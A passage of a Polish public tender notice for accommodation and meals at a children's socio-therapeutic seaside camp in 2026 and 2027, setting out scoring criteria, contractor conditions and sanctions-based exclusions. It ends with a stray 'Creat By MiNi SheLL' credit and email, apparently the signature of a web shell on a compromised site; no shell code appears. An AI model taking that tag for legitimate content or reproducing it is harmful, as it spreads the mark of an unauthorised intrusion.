Czechowice-Dziedzice, realizowanej w ramach projektu „NIE-zwykłe Dziecko. Edycja II”, współfinansowanego ze środków w ramach Fundusze Europejskie dla Śląskie <br/>2021-2027 (EFS+).<br/><br/>Wykonawca zobowiązany będzie do zrealizowania przedmiotu zamówienia, który obejmował będzie w szczególności: <br/>a) zakwaterowanie dla 51 osób: 44 dzieci i młodzieży, 6 opiekunów i 1 kierowcy w obiekcie zapewniającym bezpieczne i higieniczne warunki wypoczynku uczestników (10 nocy); <br/>b) wyżywienie dla 51 osób: 44 dzieci i młodzieży, 6 opiekunów i 1 kierowcy - zgodnie z zasadami higieny żywienia, w tym z przepisami ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jedn. Dz.U. z 2023 r. poz. 1448); <br/>c) ośrodek wypoczynkowy, w którym zakwaterowane zostaną ww. osoby, musi być położony na terenie województwa pomorskiego lub zachodniopomorskiego <br/>- w bliskiej odległości od morza (max. odległość ośrodka od nadmorskiej plaży <br/>– 800 metrów pieszo).<br/><br/>Termin realizacji części nr 2 zamówienia: <br/>- w trakcie wakacji letnich w roku 2026 (lipiec-sierpień) - świadczenie usługi zakwaterowania i wyżywienia w trakcie turnusu, obejmującego 10 kolejno następujących po sobie dób pobytowych – w wybranym przez Wykonawcę terminie od 01.07.2026 r. do 31.08.2026 r.<br/><br/>Uwagi: <br/>1) Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 6 do SWZ.<br/>2) Wszystkie wymagania określone w załączniku nr 6 do SWZ („Szczegółowy Opis Przedmiotu Zamówienia”) stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty, jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55240000-4 - Usługi w zakresie ośrodków i domów wypoczynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55270000-3 - Usługi świadczone przez placówki oferujące wyżywienie i miejsca noclegowe</p> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-07-01 do 2026-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert: <br/>- cena brutto oferty = 50% <br/>- ocena standardu obiektu = 50%.<br/>1.1. Cena oferty. <br/>Ocena porównawcza. Waga kryterium ceny = 50%<br/>Punkty w tym kryterium zostaną przyznane w zależności od zaoferowanej przez Wykonawcę ceny brutto za wykonanie przedmiotu zamówienia. Liczba punktów w kryterium „cena oferty” obliczona zostanie jako iloraz najniższej zaoferowanej ceny spośród wszystkich ofert nie podlegających odrzuceniu oraz ceny zaoferowanej w ofercie ocenianej, pomnożony przez 50 punktów.<br/>1.2. Ocena standardu obiektu.<br/>Ocena porównawcza. Waga kryterium = 50%<br/>Ocenie podlegać będą szczegółowe informacje dotyczące jednego obiektu, złożone przez Wykonawcę w formularzu ofertowym, zgodnie z opisem przedmiotu zamówienia zawartym w Załączniku nr 6 do SWZ.<br/>1.2.1. Podkryterium – Zakwaterowanie uczestników kolonii w:<br/>- pokojach dwuosobowych z pełnym węzłem sanitarnym = 15 pkt<br/>- pokojach trzyosobowych z pełnym węzłem sanitarnym = 10 pkt<br/>- pokojach czteroosobowych z pełnym węzłem sanitarnym = 5 pkt.<br/>- pokojach pięcioosobowych z pełnym węzłem sanitarnym = 0 pkt.<br/>1.2.2. Podkryterium – Odległość od obiektu kolonijnego do otwartego, strzeżonego kąpieliska nadmorskiego. <br/>Punkty w kryterium będą przyznawane na podstawie wskazanego przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ) otwartego, strzeżonego kąpieliska nadmorskiego, położonego najbliżej ośrodka, gdzie uczestnicy kolonii będą zakwaterowani (odległość rozumiana jako długość trasy do przejścia, a nie w linii prostej) – wg następujących zasad: <br/>- otwarte, strzeżone kąpielisko nadmorskie w odległości mniejszej niż 250 m od ośrodka kolonijnego = 15 pkt<br/>- od 250 m do 499 m = 10 pkt<br/>- od 500 m do 799 m = 5 pkt<br/>- 800 m = 0 pkt<br/>1.2.3. Podkryterium – Zaplecze rekreacyjne wewnątrz budynku, w którym uczestnicy kolonii będą zakwaterowani.<br/>Punkty w kryterium będą przyznawane na podstawie wskazanego przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ) zaplecza rekreacyjnego zlokalizowanego wewnątrz budynku, w którym uczestnicy kolonii będą zakwaterowani – wg następujących zasad: <br/>- 3 (trzy) sale (świetlice), wyposażone w sprzęt i urządzenia do gier i zabaw (np. piłkarzyki, stół bilardowy, stół do tenisa stołowego, gry planszowe) – w tym jedna sala (świetlica) przystosowana do organizacji dyskoteki (wyposażona w niezbędny sprzęt grający i nagłośnienie) = 10 pkt <br/>- 2 (dwie) sale (świetlice), wyposażone w sprzęt i urządzenia do gier i zabaw (np. piłkarzyki, stół bilardowy, stół do tenisa stołowego, gry planszowe) – w tym jedna sala (świetlica) przystosowana do organizacji dyskoteki (wyposażona w niezbędny sprzęt grający i nagłośnienie) = 5 pkt <br/>- 1 (jedna) sala (świetlica), wyposażona w sprzęt i urządzenia do gier i zabaw (np. piłkarzyki, stół bilardowy, stół do tenisa stołowego, gry planszowe) oraz przystosowana do organizacji dyskoteki (wyposażona w niezbędny sprzęt grający i nagłośnienie) = 0 pkt. <br/>1.2.4. Podkryterium – Zaplecze sportowo-rekreacyjne na zewnątrz budynku, w którym uczestnicy kolonii będą zakwaterowani.<br/>Punkty w kryterium będą przyznawane na podstawie wskazanego przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ) zaplecza sportowo-rekreacyjnego zlokalizowanego na zewnątrz budynku (a jednocześnie w obrębie, na terenie, ośrodka wypoczynkowego, w którym uczestnicy kolonii będą zakwaterowani) – wg następujących zasad: <br/>- obiekt wyposażony w boisko wielofunkcyjne o sztucznej nawierzchni, siłownię zewnętrzną, plac zabaw i namiot letni = 10 pkt <br/>- obiekt wyposażony w boisko wielofunkcyjne oraz jeden z ww. elementów infrastruktury (siłownię zewnętrzną lub plac zabaw lub namiot letni) = 5 pkt <br/>- obiekt wyposażony w jeden z ww. elementów infrastruktury sportowo-rekreacyjnej (boisko wielofunkcyjne o sztucznej nawierzchni lub siłownię zewnętrzną lub plac zabaw lub namiot letni) = 0 pkt. <br/>UWAGA: Szczegółowo sposób oceny ofert został określony w rozdziale 18. SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena standardu obiektu ośrodka wypoczynkowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia w ramach części nr 3 zamówienia OPS.DKA.260.1.2025 jest świadczenie usług zakwaterowania i wyżywienia podczas wyjazdowej kolonii socjoterapeutycznej dla dzieci i młodzieży <br/>w wieku 6-15 lat mieszkających na terenie gminy Czechowice-Dziedzice, realizowanej w ramach projektu „NIE-zwykłe Dziecko. Edycja II”, współfinansowanego ze środków w ramach Fundusze Europejskie dla Śląskie <br/>2021-2027 (EFS+).<br/><br/>Wykonawca zobowiązany będzie do zrealizowania przedmiotu zamówienia, który obejmował będzie w szczególności: <br/>a) zakwaterowanie dla 51 osób: 44 dzieci i młodzieży, 6 opiekunów i 1 kierowcy w obiekcie zapewniającym bezpieczne i higieniczne warunki wypoczynku uczestników (10 nocy); <br/>b) wyżywienie dla 51 osób: 44 dzieci i młodzieży, 6 opiekunów i 1 kierowcy - zgodnie z zasadami higieny żywienia, w tym z przepisami ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jedn. Dz.U. z 2023 r. poz. 1448); <br/>c) ośrodek wypoczynkowy, w którym zakwaterowane zostaną ww. osoby, musi być położony na terenie województwa pomorskiego lub zachodniopomorskiego <br/>- w bliskiej odległości od morza (max. odległość ośrodka od nadmorskiej plaży <br/>– 800 metrów pieszo).<br/><br/>Termin realizacji części nr 3 zamówienia: <br/>- w trakcie wakacji letnich w roku 2027 (lipiec-sierpień) - świadczenie usługi zakwaterowania i wyżywienia w trakcie turnusu, obejmującego 10 kolejno następujących po sobie dób pobytowych – w wybranym przez Wykonawcę terminie od 01.07.2027 r. do 31.08.2027 r.<br/><br/>Uwagi: <br/>1) Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 6 do SWZ.<br/>2) Wszystkie wymagania określone w załączniku nr 6 do SWZ („Szczegółowy Opis Przedmiotu Zamówienia”) stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty, jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55240000-4 - Usługi w zakresie ośrodków i domów wypoczynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55270000-3 - Usługi świadczone przez placówki oferujące wyżywienie i miejsca noclegowe</p> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2027-07-01 do 2027-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert: <br/>- cena brutto oferty = 50% <br/>- ocena standardu obiektu = 50%.<br/>1.1. Cena oferty. <br/>Ocena porównawcza. Waga kryterium ceny = 50%<br/>Punkty w tym kryterium zostaną przyznane w zależności od zaoferowanej przez Wykonawcę ceny brutto za wykonanie przedmiotu zamówienia. Liczba punktów w kryterium „cena oferty” obliczona zostanie jako iloraz najniższej zaoferowanej ceny spośród wszystkich ofert nie podlegających odrzuceniu oraz ceny zaoferowanej w ofercie ocenianej, pomnożony przez 50 punktów.<br/>1.2. Ocena standardu obiektu.<br/>Ocena porównawcza. Waga kryterium = 50%<br/>Ocenie podlegać będą szczegółowe informacje dotyczące jednego obiektu, złożone przez Wykonawcę w formularzu ofertowym, zgodnie z opisem przedmiotu zamówienia zawartym w Załączniku nr 6 do SWZ.<br/>1.2.1. Podkryterium – Zakwaterowanie uczestników kolonii w:<br/>- pokojach dwuosobowych z pełnym węzłem sanitarnym = 15 pkt<br/>- pokojach trzyosobowych z pełnym węzłem sanitarnym = 10 pkt<br/>- pokojach czteroosobowych z pełnym węzłem sanitarnym = 5 pkt.<br/>- pokojach pięcioosobowych z pełnym węzłem sanitarnym = 0 pkt.<br/>1.2.2. Podkryterium – Odległość od obiektu kolonijnego do otwartego, strzeżonego kąpieliska nadmorskiego. <br/>Punkty w kryterium będą przyznawane na podstawie wskazanego przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ) otwartego, strzeżonego kąpieliska nadmorskiego, położonego najbliżej ośrodka, gdzie uczestnicy kolonii będą zakwaterowani (odległość rozumiana jako długość trasy do przejścia, a nie w linii prostej) – wg następujących zasad: <br/>- otwarte, strzeżone kąpielisko nadmorskie w odległości mniejszej niż 250 m od ośrodka kolonijnego = 15 pkt<br/>- od 250 m do 499 m = 10 pkt<br/>- od 500 m do 799 m = 5 pkt<br/>- 800 m = 0 pkt<br/>1.2.3. Podkryterium – Zaplecze rekreacyjne wewnątrz budynku, w którym uczestnicy kolonii będą zakwaterowani.<br/>Punkty w kryterium będą przyznawane na podstawie wskazanego przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ) zaplecza rekreacyjnego zlokalizowanego wewnątrz budynku, w którym uczestnicy kolonii będą zakwaterowani – wg następujących zasad: <br/>- 3 (trzy) sale (świetlice), wyposażone w sprzęt i urządzenia do gier i zabaw (np. piłkarzyki, stół bilardowy, stół do tenisa stołowego, gry planszowe) – w tym jedna sala (świetlica) przystosowana do organizacji dyskoteki (wyposażona w niezbędny sprzęt grający i nagłośnienie) = 10 pkt <br/>- 2 (dwie) sale (świetlice), wyposażone w sprzęt i urządzenia do gier i zabaw (np. piłkarzyki, stół bilardowy, stół do tenisa stołowego, gry planszowe) – w tym jedna sala (świetlica) przystosowana do organizacji dyskoteki (wyposażona w niezbędny sprzęt grający i nagłośnienie) = 5 pkt <br/>- 1 (jedna) sala (świetlica), wyposażona w sprzęt i urządzenia do gier i zabaw (np. piłkarzyki, stół bilardowy, stół do tenisa stołowego, gry planszowe) oraz przystosowana do organizacji dyskoteki (wyposażona w niezbędny sprzęt grający i nagłośnienie) = 0 pkt. <br/>1.2.4. Podkryterium – Zaplecze sportowo-rekreacyjne na zewnątrz budynku, w którym uczestnicy kolonii będą zakwaterowani.<br/>Punkty w kryterium będą przyznawane na podstawie wskazanego przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ) zaplecza sportowo-rekreacyjnego zlokalizowanego na zewnątrz budynku (a jednocześnie w obrębie, na terenie, ośrodka wypoczynkowego, w którym uczestnicy kolonii będą zakwaterowani) – wg następujących zasad: <br/>- obiekt wyposażony w boisko wielofunkcyjne o sztucznej nawierzchni, siłownię zewnętrzną, plac zabaw i namiot letni = 10 pkt <br/>- obiekt wyposażony w boisko wielofunkcyjne oraz jeden z ww. elementów infrastruktury (siłownię zewnętrzną lub plac zabaw lub namiot letni) = 5 pkt <br/>- obiekt wyposażony w jeden z ww. elementów infrastruktury sportowo-rekreacyjnej (boisko wielofunkcyjne o sztucznej nawierzchni lub siłownię zewnętrzną lub plac zabaw lub namiot letni) = 0 pkt. <br/>UWAGA: Szczegółowo sposób oceny ofert został określony w rozdziale 18. SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena standardu obiektu ośrodka wypoczynkowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy 7.2.	spełniają warunki udziału w postępowaniu, określone przez Zamawiającego spośród warunków, o których mowa w art. 112 ust. 2 ustawy Pzp, dotyczące:<br/>1. zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa warunku w tym zakresie. <br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej: Zamawiający nie określa warunku w tym zakresie. <br/>3. sytuacji ekonomicznej lub finansowej: Zamawiający nie określa warunku w tym zakresie.<br/>4. zdolności technicznej lub zawodowej: za minimalny poziom zdolności uznane zostanie wykazanie przez Wykonawcę, że w celu wykonania zamówienia publicznego dysponuje (w ramach danej części zamówienia):<br/>a) obiektem noclegowym (budynek hotelowy, budynek ośrodka wypoczynkowego, pensjonat etc.), posiadającym bazę noclegową mieszczącą się w jednym budynku na minimum 51 miejsc noclegowych, pozwalającym na zapewnienie zakwaterowania w pokojach max. 5-osobowych (wyposażonych w łóżka jednoosobowe) – przy czym każdy pokój z pełnym węzłem sanitarnym - zlokalizowanym w odległości nie większej niż 200 m od obiektu gastronomicznego, o którym mowa w pkt b);<br/>b) obiektem gastronomicznym (np. restauracją, barem, stołówką) zlokalizowanym w odległości nie większej niż 200 m od obiektu noclegowego, o którym mowa w pkt a);<br/>Uwaga do punktu 4.:<br/>Zamawiający uzna za spełnione warunki pkt 4. również w przypadku, gdy obiekt noclegowy i obiekt gastronomiczny znajdują się w tej samej lokalizacji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotów środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust.1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych - w celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu:<br/>- wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty zawarte w ofercie: <br/>1. formularz ofertowy (na lub wg załącznika nr 1 do SWZ);<br/>2. pełnomocnictwo lub inny dokument potwierdzający uprawnienie do podpisania oferty (np. uchwała zgromadzenia wspólników), o ile umocowanie nie wynika z dokumentów rejestrowych;<br/>3. oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (na lub wg załącznika nr 2 do SWZ);<br/>4. oświadczenie Wykonawcy, składane na podstawie art. 117 ust. 4 ustawy Pzp, wskazujące, które świadczenia w ramach zamówienia wykonają poszczególności wykonawcy (na lub wg załącznika nr 5 do SWZ) – uwaga: dokument ten należy złożyć tylko w przypadku wspólnego ubiegania się o udzielenie zamówienia;<br/>5. dokumenty dotyczące podmiotu udostępniającego zasoby (jeżeli dotyczy):<br/>5.1. zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – w przypadku, gdy Wykonawca korzysta ze zdolności innych podmiotów na zasadach określonych w art. 118 ustawy Pzp (na lub wg załącznika nr 2a do SWZ); <br/>5.2. pełnomocnictwo lub inny dokument potwierdzający uprawnienie do podpisania dokumentów dotyczących podmiotu udostępniającego zasoby (np. uchwała zgromadzenia wspólników), o ile umocowanie nie wynika z dokumentów rejestrowych podmiotu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie realizacji zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty w postaci elektronicznej. <br/>2. W zakresie warunków udziału w postępowaniu, mogą zostać spełnione przez jednego Wykonawcę lub łącznie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>3. W odniesieniu do warunków doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie na podstawie art. 117 ust. 4 ustawy Pzp, wskazujące, jaki zakres świadczenia wynikający z umowy o zamówienie publiczne wykona dany Wykonawca – wzór oświadczenia stanowi załącznik nr 5 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Uwaga! Zapisy dotyczące zaliczek dotyczą tylko części nr 2 oraz części nr 3 zamówienia OPS.DKA.260.1.2025:<br/><br/>1. Zamawiający może udzielić Wykonawcy zaliczki na poczet wykonania przedmiotu umowy. Zaliczka może zostać udzielona do wysokości 20% wynagrodzenia Wykonawcy. Zaliczka zostanie wypłacona na podstawie otrzymanej prawidłowo wystawionej faktury zaliczkowej w terminie do 21 dni po wystawieniu faktury VAT przez Wykonawcę. Z wnioskiem o zaliczkę Wykonawca może wystąpić do Zamawiającego nie wcześniej niż na 6 miesięcy przed planowanym terminem turnusu wyjazdowej kolonii socjoterapeutycznej.<br/><br/>2. Jeżeli Wykonawcy zostanie udzielona zaliczka na poczet wykonania przedmiotu umowy, wynagrodzenie Wykonawcy zostanie pomniejszone o kwotę wypłaconej zaliczki. Zamawiający może udzielić kolejnych zaliczek do wysokości określonej w ust. 1, pod warunkiem, że Wykonawca wykaże, iż wykonał zamówienie w zakresie wartości poprzednio udzielonych zaliczek. <br/><br/>3. W przypadku odstąpienia Zamawiającego od umowy lub niewykonania przez Wykonawcę umowy z jakiejkolwiek przyczyny, Zamawiający może żądać zwrotu zaliczki, niezależnie od przysługującego mu odszkodowania lub kar umownych. W takim przypadku Wykonawca jest obowiązany zwrócić zaliczkę na wezwanie Zamawiającego w terminie określonym w wezwaniu. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone w projekcie umowy stanowiącym załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-24 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-24 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający, zgodnie z art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, w celu przeciwdziałania wspierania agresji Federacji Rosyjskiej na Ukrainę, wobec osób i podmiotów wpisanych na listę, o której mowa w art. 2 tejże ustawy, stosuje sankcje polegające m.in. na wykluczeniu z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych.<br/>2. Mając na uwadze powyższe – Zamawiający wykluczy z postępowania:<br/>1) Wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124 ze zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) Wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (tekst jedn. Dz.U. z 2023 r. poz. 120 ze zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>Uwaga: Wykluczenie następuje na okres trwania okoliczności określonych powyżej.<br/>Uwaga: W przypadku Wykonawcy wykluczonego na podstawie pkt 7.1.6.1., Zamawiający odrzuca ofertę takiego Wykonawcy. Osoba lub podmiot podlegający wykluczeniu na podstawie pkt 7.1.6.1 SWZ., który w okresie tego wykluczenia ubiega się o udzielenie zamówienia publicznego lub bierze udział w postępowaniu o udzielenie zamówienia publicznego, podlega karze pieniężnej. Karę pieniężną, o której mowa powyżej nakłada Prezesa Urzędu Zamówień Publicznych, wdrodze decyzji, w wysokości do 20 000 000,00 zł.

Creat By MiNi SheLL
Email: jattceo@gmail.com